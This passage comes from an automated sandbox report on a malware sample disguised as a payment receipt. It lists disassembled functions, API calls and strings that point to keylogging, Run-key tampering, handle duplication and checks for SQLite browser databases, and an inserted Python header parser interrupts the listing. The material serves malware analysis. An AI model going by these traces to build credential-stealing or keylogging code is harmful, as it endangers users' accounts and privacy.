                                                    • Opcode Fuzzy Hash: aedcab76af92cc4bc62ea73aa4e5c5ea7e51aa4d01cdec665397a9b648c5c9e1
                                                    • Instruction Fuzzy Hash: 62E0E531B46218A797206F25AC02E7FBB54DF14B22F5101BAFC0557352CE288D01A6DE
                                                    APIs
                                                    • _free.LIBCMT ref: 00448835
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast_free
                                                    • String ID: `@$`@
                                                    • API String ID: 1353095263-20545824
                                                    • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                    • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                    • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                    • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                    APIs
                                                    • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: State
                                                    • String ID: [CtrlL]$[CtrlR]
                                                    • API String ID: 1649606143-2446555240
                                                    • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                    • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                    • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                    • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteOpenValue
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                    • API String ID: 2654517830-1051519024
                                                    • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                    • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                    • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                    • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                    • GetLastError.KERNEL32 ref: 0043FB12
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1717984340-0
                                                    • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                    • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                    • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                    • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

                                                    Control-flow Graph

                                                    APIs
                                                    • memset.MSVCRT ref: 004091E2
                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                    • String ID:
                                                    • API String ID: 3715365532-3916222277
                                                    • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                    • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                    • String ID: bhv
                                                    • API String ID: 4234240956-2689659898
                                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                    • memset.MSVCRT ref: 0040E1BD
                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                    • free.MSVCRT ref: 0040E28B
                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                    • API String ID: 2804212203-2982631422
                                                    • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                    • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                    APIs
                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: memcmp
                                                    • String ID: @ $SQLite format 3
                                                    • API String ID: 1475443563-3708268960
                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
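The function above compares 16 bytes of a buffer against "SQLite format 3", which is the SQLite 3 file-header magic ("SQLite format 3" followed by a NUL byte). Chrome's "Login Data" / "Cookies" and Firefox's cookies.sqlite / places.sqlite are SQLite 3 databases, so this check is consistent with the report's browser-credential-theft and WebBrowserPassView signatures. The Python below is an added triage example, not code from the report or from the sample: it performs the same 16-byte header comparison and then parses the fixed fields of the 100-byte SQLite 3 header so a responder can confirm what a harvested file is before opening it. The sample header bytes are constructed inline; the 4-byte and 3-byte comparisons the function also performs are not reproduced because the report does not show what they are compared against.

```python
import struct

# 16-byte SQLite 3 magic, per the SQLite file-format specification.
SQLITE3_MAGIC = b"SQLite format 3\x00"

# Text-encoding codes stored at header offset 56.
_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def is_sqlite3(data: bytes) -> bool:
    """Same test as the analysed function: memcmp(data, "SQLite format 3", 16)."""
    return len(data) >= 16 and data[:16] == SQLITE3_MAGIC


def sqlite3_header(data: bytes) -> dict:
    """Parse the fixed fields of the 100-byte SQLite 3 database header.

    Offsets follow the SQLite file-format spec; all integers are big-endian.
    Raises ValueError when the magic is absent or the header is truncated.
    """
    if not is_sqlite3(data) or len(data) < 100:
        raise ValueError("not a SQLite 3 database header")

    page_size = struct.unpack_from(">H", data, 16)[0]
    if page_size == 1:          # the spec encodes a 65536-byte page as 1
        page_size = 65536

    (change_counter, db_size_pages, first_freelist, freelist_count,
     schema_cookie, schema_format, cache_size, largest_root,
     encoding_code, user_version, incr_vacuum, app_id) = struct.unpack_from(
        ">12I", data, 24)
    version_valid_for, sqlite_version = struct.unpack_from(">2I", data, 92)

    return {
        "page_size": page_size,
        "write_version": data[18],
        "read_version": data[19],
        "reserved_per_page": data[20],
        "change_counter": change_counter,
        "db_size_pages": db_size_pages,
        "freelist_pages": freelist_count,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "text_encoding": _ENCODINGS.get(encoding_code, f"unknown({encoding_code})"),
        "user_version": user_version,
        "application_id": app_id,
        "sqlite_version": sqlite_version,
    }


def build_sample_header(page_size: int = 4096, encoding: int = 1,
                        sqlite_version: int = 3045000) -> bytes:
    """Constructed test input (not captured from the sample): a minimal valid
    100-byte SQLite 3 header. Payload-fraction bytes 21..23 are the fixed
    values 64, 32, 32 required by the spec."""
    hdr = bytearray(100)
    hdr[0:16] = SQLITE3_MAGIC
    struct.pack_into(">H", hdr, 16, page_size)
    hdr[18], hdr[19], hdr[20] = 1, 1, 0
    hdr[21], hdr[22], hdr[23] = 64, 32, 32
    struct.pack_into(">I", hdr, 28, 12)            # database size in pages
    struct.pack_into(">I", hdr, 56, encoding)      # text encoding
    struct.pack_into(">I", hdr, 96, sqlite_version)
    return bytes(hdr)


def classify(data: bytes) -> str:
    """Short label for triage output: 'sqlite3' or 'other'."""
    return "sqlite3" if is_sqlite3(data) else "other"


if __name__ == "__main__":
    sample = build_sample_header()
    print(classify(sample), sqlite3_header(sample))
    print(classify(b"SQLite format 2\x00" + b"\x00" * 84))
```

Note that the magic check alone is what the malware needs to decide whether to run its SQLite reader on a file; the header parser is the extra step a responder wants, because a wrong page size or an unexpected text encoding is the usual reason a recovered "Login Data" or "cookies.sqlite" copy fails to open.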
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmpqsort
                                                    • String ID: /nosort$/sort
                                                    • API String ID: 1579243037-1578091866
                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ??2@
                                                    • String ID:
                                                    • API String ID: 1033339047-0
                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID: *.*$index.dat
                                                    • API String ID: 1974802433-2863569691
                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID:
                                                    • API String ID: 613200358-0
                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518